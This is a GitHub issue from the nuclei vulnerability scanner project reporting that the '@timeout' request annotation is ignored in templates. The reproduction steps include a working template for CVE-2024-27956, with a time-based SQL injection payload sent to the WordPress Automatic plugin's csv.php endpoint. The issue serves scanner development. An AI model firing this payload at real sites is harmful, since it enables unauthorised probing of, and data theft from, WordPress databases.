timeout request annotation not working in templates #5137

Closed
tarunKoyalwar opened this issue May 2, 2024 · 0 comments · Fixed by #5148
Labels
Type: Bug Inconsistencies or issues which will cause an issue or problem for users or implementors.
tarunKoyalwar commented May 2, 2024

Nuclei version:

main | dev

Current Behavior:

Note

This is directly related to max-host-error, so we need to make sure that we ignore timeout-based templates from mhe, since these are not unresponsive errors but are caused by the exploit

Proposed Solution

Steps To Reproduce:

id: CVE-2024-27956

info:
  name: WordPress Automatic Plugin <= 3.92.0 - SQL Injection
  author: DhiyaneshDK
  severity: critical
  description: |
    The Automatic plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.92.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  remediation: |
    Update to version 3.92.1 or later.
  reference:
    - https://github.com/truonghuuphuc/CVE-2024-27956
    - https://patchstack.com/database/vulnerability/wp-automatic/wordpress-automatic-plugin-3-92-0-unauthenticated-arbitrary-sql-execution-vulnerability?_s_id=cve
    - https://github.com/NaInSec/CVE-LIST
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:L
    cvss-score: 9.9
    cve-id: CVE-2024-27956
    cwe-id: CWE-89
    epss-score: 0.00043
    epss-percentile: 0.08203
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "wp-content/plugins/wp-automatic"
  tags: cve,cve2024,sqli,wordpress,wpscan,wp-automatic

http:
  - raw:
      - |
        @timeout: 20s
        POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        q=SELECT IF(1=1,sleep(5),sleep(0));&auth=%00&integ=dc9b923a00f0e449c3b401fb0d7e2fae

    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'
          - 'status_code == 200'
          - 'contains(header, "application/csv")'
        condition: and

Anything else:

tarunKoyalwar added the "Type: Bug" label (Inconsistencies or issues which will cause an issue or problem for users or implementors.) May 2, 2024
tarunKoyalwar changed the title from "timeout not working in templates" to "timeout request annotation not working in templates" May 2, 2024
tarunKoyalwar self-assigned this May 2, 2024
ehsandeep added this to the nuclei v3.2.8 milestone May 24, 2024
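
The note in the issue says a timeout on a request that carries its own `@timeout` annotation should not count toward max-host-error. A minimal Go sketch of that rule, added here as an illustration; it is not nuclei's code or the fix in #5148. `parseTimeout`, `hostErrors`, `record` and `skip` are hypothetical names, and representing the timeout as `context.DeadlineExceeded` is an assumption.

```go
package main

import (
	"context"
	"errors"
	"fmt"
	"strings"
	"time"
)

// parseTimeout reads an "@timeout: <duration>" annotation from the lines that
// precede the request line of a raw request block.
func parseTimeout(raw string) (time.Duration, bool) {
	for _, line := range strings.Split(raw, "\n") {
		line = strings.TrimSpace(line)
		if line == "" {
			continue
		}
		if !strings.HasPrefix(line, "@") {
			break // request line reached: no more annotations
		}
		if strings.HasPrefix(line, "@timeout:") {
			d, err := time.ParseDuration(strings.TrimSpace(strings.TrimPrefix(line, "@timeout:")))
			return d, err == nil && d > 0
		}
	}
	return 0, false
}

// hostErrors is a hypothetical stand-in for a max-host-error counter;
// skip reports whether a host has reached the limit.
type hostErrors struct {
	max    int
	counts map[string]int
}

// record counts err against host, except a deadline error on a request that
// set its own @timeout: that delay is expected from a time-based check.
func (h *hostErrors) record(host string, err error, annotated bool) {
	if err == nil || (annotated && errors.Is(err, context.DeadlineExceeded)) {
		return
	}
	h.counts[host]++
}
func (h *hostErrors) skip(host string) bool { return h.counts[host] >= h.max }

func main() {
	d, ok := parseTimeout("@timeout: 20s\nGET / HTTP/1.1\nHost: example.test\n") // constructed input
	fmt.Println(d, ok)
}
```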